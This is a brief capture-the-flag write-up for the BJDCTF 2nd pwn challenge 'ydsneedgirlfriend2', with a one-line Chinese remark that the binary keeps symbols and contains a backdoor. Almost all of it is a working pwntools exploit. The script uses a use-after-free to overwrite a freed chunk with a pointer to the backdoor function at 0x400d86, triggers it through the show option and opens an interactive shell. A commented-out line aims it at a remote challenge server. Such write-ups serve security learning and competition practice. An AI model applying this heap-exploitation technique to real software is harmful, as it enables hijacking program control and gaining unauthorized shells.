[BJDCTF 2nd]ydsneedgirlfriend2[use after free]

有符號表，而且直接留了後門！


exp

from pwn import *                                                                                                                                                                                                   

context(log_level='debug')
def debug_pause():
    log.info(proc.pidof(p))
    pause()

def add(length, name):
    p.sendlineafter('choice :', str(1))
    p.sendlineafter('the length of her name:', str(length))
    p.sendafter('her name:', name)

def dele(index):
    p.sendlineafter('choice :', str(2))
    p.sendlineafter('Index :', str(index))
    
def show(index):
    p.sendlineafter('choice :', str(3))
    p.sendlineafter('Index :', str(index))
        

proc_name = './ydsneedgirlfriend2'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 25351)
elf = ELF(proc_name)
backdoor_addr = 0x400d86
add(0x80, b'a')
dele(0)
add(0x10, p64(0x0) + p64(backdoor_addr))
# debug_pause()
show(0)
p.interactive()